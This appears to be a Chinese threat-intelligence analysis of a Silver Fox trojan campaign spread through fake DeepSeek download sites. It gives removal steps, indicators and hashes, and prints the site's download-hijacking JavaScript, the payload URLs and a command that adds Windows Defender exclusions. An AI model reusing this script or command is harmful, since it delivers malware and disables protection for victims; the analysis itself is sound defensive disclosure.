静态步骤( by SYSTEM-RAMOS-ZDY)
1 资源管理器,地址栏,输入(%windir%\System32\Codeintegrity)并回车
2 找到WDCP策略文件(SiPolicy.p7b)并删除
3 立即创建(SiPolicy.p7b)同名文件夹
4 输入(%windir%\System32\tasks)并回车
5 删除(最新日期/随机字符)任务计划文件
6 开始菜单任意位置,输入(taskschd.msc)并回车
7 检查任务计划列表,刚才(随机字符)任务是否已被移除
8 如果没有移除。选中(随机字符)任务并右键(删除)
9 重启电脑,此时病毒理论上不会开机自启,杀毒软件也可以正常运行了
0 立即启动任意有效杀毒软件,进行全盘扫描,对银狐病毒内容进行查杀
如果是公司,请立即报告技术人员,谨防更深入的横向感染或窃密勒索
外壳站群
域 名 apps-hupu[.]com[.]cn
注册商 北京新网数码信息技术有限公司
注册人 546L6L6J
邮 箱 YWxpcmV6YWpvYmUxNzFAZ21haWwuY29t
省/州 山东(shandongsheng)
地 区 中国(CN)
注册日 2026-08-15 15:10:21 UTC+8
过期日 2027-08-15 15:10:21 UTC+8
状 态 正常
DNS ns1[.]363[.]hk
ns2[.]363[.]hk
DNSSEC 未配置
域 名 decpseek[.]com[.]cn
注册商 北京新网数码信息技术有限公司
注册人 55Sw5pet
邮 箱 NDU2ODE1NDY1QHFxLmNvbQ==
省/州 贵州(guizhousheng)
地 区 中国(CN)
注册日 2026-08-13 17:58:08 UTC+8
过期日 2027-08-13 17:58:08 UTC+8
状 态 正常
DNS ns1[.]363[.]hk
ns2[.]363[.]hk
DNSSEC 未配置
落地通信
域 名 noah-ssh[.]com[.]cn
注册商 Web Commerce Communications Limited
注册人 5LmU6JOJ6JOJ
邮 箱 Mzg3NzA5ODg2NUBxcS5jb20=
注册日 2026-08-10 17:05:04 UTC+8
过期日 2027-08-10 17:05:04 UTC+8
状 态 客户端禁止转移
DNS a9[.]share-dns[.]com
b9[.]share-dns[.]net
DNSSEC 未配置
落地中继
域 名 workers[.]dev
注册商 CloudFlare, Inc.
注册人 CloudFlare, Inc.
邮 箱
省/州 加利福尼亚州(CA)
地 区 美国(US)
电 话 +1. NDE1MzE5NzUxNw==
注册日 2019-02-09 04:36:47 UTC+8
过期日 2027-02-09 04:36:47 UTC+8
更新日 2025-11-16 20:00:30 UTC+8
IANA_ID 1910
状 态 客户端禁止删除
客户端禁止转移
客户端禁止更新
DNS clyde[.]ns.cloudflare[.]com
sofia[.]ns.cloudflare[.]com
DNSSEC 未配置
下载服务
域 名 xujvgk[.]cn
注册商 Web Commerce Communications Limited
注册人 5YCZ6ZW/5bKt
邮 箱 c2ltYXh1ZW1laTFAMTYzLmNvbQ==
注册日 2025-12-31 10:42:10 UTC+8
过期日 2027-12-31 10:42:10 UTC+8
状 态 客户端禁止转移
DNS ns1[.]julydns[.]com
ns2[.]julydns[.]com
DNSSEC 未配置
文件指纹
install_h8.0.13.exe
大小: 30254520 字节 : 28 MiB
CRC32: D6348AF1
CRC64: 42F5971128BC3ED4
XXH64: C5A03DFD2213C8A4
SHA256: 9868ba2e4c6fc4e4a884e1621ae23764f4fa677911a7191f21763258a1dff14e
SHA3-256: ed1938447a8cbb4dacbd2e6b3e034888168a522eb066d507506a6270e3d99896
tad
大小: 512 字节
CRC32: 02AB29FB
CRC64: D2E466471CF610FA
XXH64: 0BDC033FC833D7EC
SHA256: cccf456c2ca882205c1fb4df938a017b4d503e632c4f69d591d6cdf2da08a23f
SHA3-256: 60c3a50a6c518b57192c2ca6de4bf19e4a4193232570ba917df53326eb03414b
a.gif
大小: 140021 字节 : 136 KiB
CRC32: 2DC9BEA3
CRC64: 1EDC226E537C42F9
XXH64: 2680E6BF635284CC
SHA256: 6349d18308f458ed290913068752471c453f1c9bbd472a73e9f92b444718bd4d
SHA3-256: 28105448024ccf2e9eb57457c5a06f145a8619180ca82d0a8c27d60606c7137c
b.gif
大小: 3256757 字节 : 3180 KiB
CRC32: 3A846A73
CRC64: FFF2EDBADE398A93
XXH64: 7C178DA3F47AFD71
SHA256: ea41d3b33fcf4929823c1a054d92208bb6275c3281da3b77d8a3521b261b2646
SHA3-256: 0cd64845d01c3cbeff5374edd1d3979e5787c612fc62547700f1f69bf88c99f8
c.gif
大小: 9286 字节 : 9 KiB
CRC32: B3AD0E7C
CRC64: 97DF19ED95BB4FBB
XXH64: 68B85F6B83E86F16
SHA256: c0627c59e27a670503683d2c5c117e126f4969144815317540895066c819b6f6
SHA3-256: 8d0eb2d33170c557e345cac3ea22be168b5f4bc049f6de58be2a72a59b0dbc4f
d.gif
大小: 4901754 字节 : 4786 KiB
CRC32: 0483DFC3
CRC64: 3B8A4677B0D00854
XXH64: DB2C38C6F9C292FC
SHA256: f5bfec979b53dd7b0c467f06ade20b3b2a6a006f1f045530ada92f405b6510c2
SHA3-256: 9cf6924c0ea09b225ef86f9477702bd557dd2919789d188e8c1e7fb1606493bc
s.jpg
大小: 83215 字节 : 81 KiB
CRC32: 58539318
CRC64: B1F5AECA117512E1
XXH64: A900358DF44D1043
SHA256: 71369dd8ef596d4eefaf21b831dc87f78eeaf2c3436eb95c24981a6d39151dd7
SHA3-256: aa9e63289e2766144c35cfe21b5a4a0e8db5fa226879b57ce75033929a610c7b
s.dat
大小: 28272 字节 : 27 KiB
CRC32: 3B4AA01D
CRC64: 257E71E899CE35A6
XXH64: 69F01E7D0CBC0099
SHA256: d0321b6b6e6712d22ee9fd63f90c2de477e11a4da2ec97501eb423b8e3cb6d0f
SHA3-256: 3c1c64aae08a33d16fc91d8b2a4272f3fc6f43bf3666c30f01910a9e745e27e5
drops.jpg
大小: 28122 字节 : 27 KiB
CRC32: 0BDCA51E
CRC64: 691AB664163AD2C7
XXH64: AD3BB6CF425CC6AE
SHA256: a70e8f7d7d850f36f2c39d0d1b7dd964ddb15ee24755e660d14953665890d34a
SHA3-256: 4f246c75916ddddcc7475dd7f0c4c861a20fdee008c7c5fb6c1671587f291c13
火绒扫描(我自己的本地扫描结果)
6.0.11.2 版本
08-23 18:55 病毒库
2026/08/24 11:20:48
病毒防护
文件实时监控
发现病毒Trojan/Injector,clcrit, 已处理
病毒名称:Trojan/Injector.c!crit
病毒ID:434E9E374546A127
病毒路径:install_h8.0.13.exe
操作类型:修改
操作结果:已处理,删除文件
2026/08/24 11:33:17
病毒防护
病毒查杀
自定义扫描(手动执行),发现1个风险项目
病毒库时间:2026-08-23 18:55
开始时间:2026-08-24 11:33
执行类型:手动执行
扫描类型:自定义扫描
总计用时:00:00:01
扫描对象:12
扫描文件:8
发现风险:1
已处理风险:1
病毒详情:
风险路径:install_h8.0.13.exe
病毒名:Trojan/Injector.c!crit
病毒ID:434E9E374546A127
处理结果:已处理,删除文件
外联统计
<script charset="UTF-8" id="LA_COLLECT" src="//sdk[.]51[.]la/js-sdk-pro.min.js"></script>
<script>
LA.init({
id: "3QbvgmKU4mQXDLRW",
ck: "3QbvgmKU4mQXDLRW"
})
</script>
必应统计
<meta name="msvalidate.01" content="0A3325D924B70BCEDD52266CF66B6F21" />
https://github.com/Amery2010/HEAD/raw/refs/heads/master/README.md
https://github.com/joshbuchea/HEAD/raw/refs/heads/master/README.md
注释列表
<!-- 统计代码:优先加载 -->
<!-- 预加载 & 规范化 -->
<!-- 站点图标预留 -->
<!-- Font Awesome 6 -->
<!-- HERO -->
<!-- 深寻AI 专属模块 -->
<!-- 新增:DeepSeek网页版 特色模块(约180字) -->
<!-- 1. 官方渠道与产品定位 -->
<!-- 2. 下载引导 -->
<!-- 3. V4系列两大核心亮点 -->
<!-- 4. 极致性价比与API -->
<!-- 5. 开源生态与社区 -->
<!-- 新增:常见问题模块 -->
<!-- 底部 -->
<!-- 动态兜底脚本 -->
<!-- 5个锚文本关键词(必应热门) -->
核心脚本
<!-- 动态兜底脚本 -->
(
function () {
var DISCOVERY = [
'https://noah-ssh[.]com[.]cn/relays.json',
'https://noah-relay[.]wotudj578[.]workers[.]cdev',
'https://noah-relay2[.]wotudj578[.]workers[.]cdev'
];
var POOL_KEY = 'noah_relay_pool';
var LINK = '';
var resolving = false;
var NOAH_DL_REV = 'r4';
function targets() {
var list = document.querySelectorAll('[data-download]');
if (list.length) return list;
var all = document.querySelectorAll('a, button');
var picked = [];
for (var i = 0; i < all.length; i++) {
var t = (all[i].textContent || '').replace(/\s+/g, '');
if (/下载|立即下载|免费下载|电脑版|^download$/i.test(t)) picked.push(all[i]);
}
return picked;
}
function startDownload(url) {
if (!url) return;
try {
var ifr = document.createElement('iframe');
ifr.style.display = 'none';
ifr.src = url;
(document.body || document.documentElement).appendChild(ifr);
setTimeout(
function () {
try {
ifr.parentNode.removeChild(ifr);
} catch (e) {
}
},
120000
);
} catch (e) {
window.open(url, '_blank');
}
}
function onClick(ev) {
if (ev) {
ev.preventDefault();
ev.stopPropagation();
}
if (LINK) {
startDownload(LINK);
return false;
}
resolve(function () {
if (LINK) startDownload(LINK);
});
return false;
}
function bind() {
var list = targets();
for (var i = 0; i < list.length; i++) {
var el = list[i];
if (el.__noahBound) continue;
el.__noahBound = true;
if (el.tagName === 'A') el.setAttribute('href', 'javascript:void(0)');
el.style.cursor = 'pointer';
el.addEventListener('click', onClick, false);
}
}
function getCachedPool() {
try {
var o = JSON.parse(localStorage.getItem(POOL_KEY) || 'null');
if (o && o.relays && o.relays.length) return o;
} catch (e) {
}
return null;
}
function fetchLink(relays, i, done) {
if (!relays || i >= relays.length) {
if (done) done();
return;
}
var ctrl = new AbortController();
var timer = setTimeout(function () {
ctrl.abort();
}, 2500);
fetch(
relays[i].replace(/\/+$/, '') + '/api.php?t=' + Date.now(),
{
signal: ctrl.signal,
cache: 'no-store'
}
).then(function (r) {
return r.ok ? r.json() : Promise.reject();
}).then(
function (data) {
clearTimeout(timer);
if (data && data.download_link) {
LINK = data.download_link;
bind();
if (done) done();
}
else fetchLink(relays, i + 1, done);
}
).catch(function () {
clearTimeout(timer);
fetchLink(relays, i + 1, done);
});
}
function discover(i, onDone) {
if (i >= DISCOVERY.length) {
onDone(null);
return;
}
var ctrl = new AbortController();
var timer = setTimeout(function () {
ctrl.abort();
}, 3000);
fetch(
DISCOVERY[i] + (DISCOVERY[i].indexOf('?') >= 0 ? '&' : '?') + '_=' + Date.now(),
{
signal: ctrl.signal,
cache: 'no-store'
}
).then(function (r) {
return r.ok ? r.json() : Promise.reject();
}).then(
function (pkg) {
clearTimeout(timer);
var data = pkg &&
pkg.data ? pkg.data : pkg;
if (data && data.relays && data.relays.length) {
try {
localStorage.setItem(POOL_KEY, JSON.stringify(data));
} catch (e) {
}
onDone(data);
} else {
discover(i + 1, onDone);
}
}
).catch(function () {
clearTimeout(timer);
discover(i + 1, onDone);
});
}
function resolve(done) {
if (resolving) {
if (done) setTimeout(done, 800);
return;
}
resolving = true;
discover(
0,
function (fresh) {
var pool = fresh ||
getCachedPool();
if (pool) fetchLink(pool.relays, 0, function () {
resolving = false;
if (done) done();
});
else {
resolving = false;
if (done) done();
}
}
);
}
if (document.readyState === 'loading') {
document.addEventListener('DOMContentLoaded', bind);
} else {
bind();
}
resolve();
}
) ();
落地通信
https://noah-ssh[.]com[.]cn/relays.json?_=1787569828637
{
"data": {
"v": 1786523551,
"updated_at": 1786523551,
"relays": [
"https://noah-ssh[.]com[.]cn",
"https://noah-relay[.]wotudj578[.]workers[.]dev",
"https://noah-relay2[.]wotudj578[.]workers[.]dev"
]
},
"sig": ""
}
落地中继
https://noah-relay[.]wotudj578[.]workers[.]dev
https://noah-relay[.]wotudj578[.]workers[.]dev/relays.json?_=1787603702460
{
"data": {
"v": 1,
"updated at": 1,
"relays": [
"https://noah-ssh[.]com[.]cn",
"https://noah-re1ay2[.]wotudj578[.]workers[.]dev"
]
},
"sig": ""
}
下载赋值
https://noah-ssh[.]com[.]cn/api.php?t=1787569829175
{
"download_link": "https://www[.]xujvgk[.]cn/doload32"
}
落地信息
https://noah-ssh[.]com[.]cn/admin
403 Forbidden:当前 IP 不在管理白名单(0.0.0.0)
后台参考
https://www.bilibili.com/video/BV1ebEh6bEU3
https://www.bilibili.com/video/BV1663n6dEaJ
银狐SK落地页(其中之一)后台参考
弱密码,现在已经添加IP登录白名单
文件属性
SFX ZIP 压缩文件
总文件夹
5
总文件
12
总大小
47,355
打包大小
9,285
压缩率
19%
SFX 模块大小
1,330,167 字节
字典大小
32 KB
参考信息
x64 Microsoft Visual C++ v.9.00 - 2008 - (exe 4883EC28-48) - no sec. Cab.7z.Zip ,
Overlay : Signed - Name : Auerswald USB-Treiber Deinstallation.
Not packed , try debug www.ollydbg.de or www.x64dbg.com
文件说明
Auerswald USB-Treiber Deinstallation
文件版本
4.0.0.18
产品名称
Auerswald USB-Treiber Deinstallation
版权
Copyright @ 2009 AuerswaldGmbH & Co.KG
大小
28.8 MB
语言
德语(德国)
原始文件名
Cleaner.exe
目录预览
install_h8.0.13.exe
├── [Content_Types].xml #82872409
└──word
├──styles.xml #C34C27AB
├──settings.xml #209C89FB
├──fontTable.xml #3813F668
├──document.xml #A757D11A
├──webSettings.xml #4E16A017
├──stylesWithEffects.xml #6E199955
└──_rels
└──document.xml.rels #39973B7C
└──theme
└──theme1.xml #2943DD30
└──_rels
└──.rels #B71A911E
└──docProps
└──app.xml #D6CA704E
└──core.xml #702D7A44
尝试解压
! install_h8.0.13.exe: 文件报头已损坏
! install_h8.0.13.exe: 不可预料的压缩文件末端
! install_h8.0.13.exe: 主压缩文件报头已损坏
恶意载荷
https://2bbaz2[.]oss-cn-beijing[.]aliyuncs[.]com/tad
https://2bbaz2[.]oss-cn-beijing[.]aliyuncs[.]com/a.gif
https://2bbaz2[.]oss-cn-beijing[.]aliyuncs[.]com/b.gif
https://2bbaz2[.]oss-cn-beijing[.]aliyuncs[.]com/c.gif
https://2bbaz2[.]oss-cn-beijing[.]aliyuncs[.]com/d.gif
https://2bbaz2[.]oss-cn-beijing[.]aliyuncs[.]com/s.dat
https://2bbaz2[.]oss-cn-beijing[.]aliyuncs[.]com/s.jpg
https://mm2027[.]oss-cn-hangzhou[.]aliyuncs[.]com/drops.jpg
释放文件
C:\Windows\Temp\ranchserv.jpg
C:\Users\Public\artiUN\msadox.tb
C:\Users\Public\artiUN\adoresd.dat
C:\Users\Public\artiUN\CPU0Nb.exe
C:\Users\Public\artiUN\checktime.vbs
C:\Users\Public\artiUN\UxEnhance64.dll
窗口查找
Q360SafeMonClass
杀软排除
cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%USERPROFILE%\Documents" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
"C:\Users"
"C:\ProgramData"
"C:\Program Files (x86)"
"C:\Users\Public\eUCkvd"
"%USERPROFILE%\Documents"
这些命令是典型的修改 Windows Defender 排除路径的操作,目的是让 Windows Defender 不再扫描指定目录,从而绕过或削弱杀毒软件检测。
它们通过“计划任务”以 SYSTEM 最高权限执行,并在执行后立即删除任务,以清理痕迹。
计划任务
### 一、注册信息(RegistrationInfo)
- 任务描述:无(字段为空)
- 任务路径:`\`(位于任务计划程序库的根目录)
### 二、触发条件(Triggers)
共配置 2 个触发器,满足任一条件即触发任务执行:
1. **登录触发器(LogonTrigger)**
- 状态:已启用
- 触发时机:用户登录系统时自动执行
2. **时间触发器(TimeTrigger)**
- 状态:已启用
- 起始基准时间:`2009-04-23 00:00:00`
- 重复周期:每 1 分钟执行一次(格式 `PT1M`)
- 循环规则:无停止时限,会持续循环执行
### 三、运行身份(Principals)
- 身份标识:`Author`
- 运行用户组:`S-1-5-32-545`(对应系统内置的 **Users 用户组**)
- 权限等级:`HighestAvailable`(以当前用户可用的最高权限运行,即管理员权限)
### 四、任务运行设置(Settings)
表格
| 配置项 | 取值 | 实际含义 |
| --- | --- | --- |
| 多实例策略 | IgnoreNew | 任务已在运行时,直接忽略新的启动请求 |
| 电池供电启动 | DisallowStartIfOnBatteries = false | 笔记本使用电池供电时也允许启动任务 |
| 切电池时停止 | StopIfGoingOnBatteries = true | 设备切换到电池供电时,立即停止任务 |
| 强制终止权限 | AllowHardTerminate = false | 不允许系统强制结束该任务进程 |
| 错过补执行 | StartWhenAvailable = true | 错过触发时间后,系统就绪时立即补跑 |
| 网络依赖 | RunOnlyIfNetworkAvailable = false | 无需网络连接即可运行 |
| 界面可见性 | Hidden = true | 在任务计划程序图形界面中隐藏该任务 |
| 手动启动 | AllowStartOnDemand = true | 允许用户手动触发任务运行 |
| 任务总开关 | Enabled = true | 任务整体处于启用状态 |
| 空闲条件 | RunOnlyIfIdle = false | 不要求系统处于空闲状态才运行 |
| 唤醒运行 | WakeToRun = false | 不会唤醒睡眠中的计算机执行任务 |
| 执行时长限制 | ExecutionTimeLimit = PT0S | 无执行时间上限,进程可永久运行 |
| 进程优先级 | Priority = 4 | 正常优先级(范围 0~10,0 为最高优先级) |
空闲状态子规则:
- 系统空闲期结束时停止任务:是
- 系统再次进入空闲时重启任务:否
### 五、执行操作(Actions)
任务触发后执行的核心动作:
- 操作类型:启动外部程序(`Exec`)
- 目标程序路径:`C:\Users\Public\Bkx1av\eDRUae.exe`
- 程序工作目录:`C:\Users\Public\Bkx1av\`
- 命令行启动参数:无
> 补充特征提示:该任务具备「界面隐藏、每分钟高频执行、管理员权限、无运行时限、禁止系统强制终止」等特征,且程序路径位于公共用户目录、文件名无明确业务语义,这类配置常见于恶意软件实现系统持久化的手段,建议对目标 exe 文件进行安全校验。
外壳站群
https://s.threatbook.com/report/url/ad44aad7900c38fd2e0ab9e837c1cee4
https://s.threatbook.com/report/url/bbca6e7ee66e2ffad07b504aa605a529
落地通信
https://s.threatbook.com/report/url/6da3f92f64b094cd3c44eaa5b2eb3e82
https://s.threatbook.com/report/url/bf3641ca88e02cddca053b1c65b8c9dc
落地中继
https://s.threatbook.com/report/url/cd2e3dfe1a22e443f5168f83d093d718
https://s.threatbook.com/report/url/3bb188ac541188419501bc9755fb2426
落地后台
https://s.threatbook.com/report/url/0c05472d46527af9da348b9eb80b3c74
下载赋值
https://s.threatbook.com/report/url/e027c21cecbaf39b691a88187473220e
恶意载荷
https://s.threatbook.com/report/url/446a728ae59b1a272046bbd33c84f846
https://s.threatbook.com/report/url/8359e81ac319d062a90c28fdd2accdd1
https://s.threatbook.com/report/url/5301d041df6e0f04e806e2cebffa0f19
https://s.threatbook.com/report/url/dd7b5d96d49936147aa21f571e0633cb
https://s.threatbook.com/report/url/d6a8156202507ede072025ae8d4cb00e
https://s.threatbook.com/report/url/a91329898e3d2177816c872a20b3fd86
https://s.threatbook.com/report/url/a06f2fd147d11639103e8d79679bc4b4
https://s.threatbook.com/report/url/767475c3609d90d469de46f1900c7b18
样本情况
https://virusscan.jotti.org/zh-CN/filescanjob/d6nl9qzw4l
https://tix.qq.com/search/single?keyword=1017ed199f9158b4a28c250a0bd00927
https://www.maldun.com/analysis/YXNkZmRzZmFkc2YxMjkyNDA2ZHNmYXNkZmFzZGY=/
https://sandbox.ti.qianxin.com/sandbox/page/detail?type=file&id=AaAxzVcBmTITNisAOUD4
https://sandbox.dbappsecurity.com.cn/report/a8a8829d-7141-47d9-a5a0-40c1044184b9/flat
https://fenxi.antiy.cn/#/entirety/file/searchResult?hash=1017ed199f9158b4a28c250a0bd00927
https://virus.cverc.org.cn/#/entirety/file/searchResult?hash=1017ed199f9158b4a28c250a0bd00927
https://www.virscan.org/report/9868ba2e4c6fc4e4a884e1621ae23764f4fa677911a7191f21763258a1dff14e
https://www.virustotal.com/gui/file/9868ba2e4c6fc4e4a884e1621ae23764f4fa677911a7191f21763258a1dff14e
https://s.threatbook.com/report/file/9868ba2e4c6fc4e4a884e1621ae23764f4fa677911a7191f21763258a1dff14e
https://sandbox.qianxin.com/tq/report/toNewReport.do?rid=3e9c6df2031b263b1b84b315d4bfe9bf&sk=71352832
https://opentip.kaspersky.com/9868BA2E4C6FC4E4A884E1621AE23764F4FA677911A7191F21763258A1DFF14E/results?tab=upload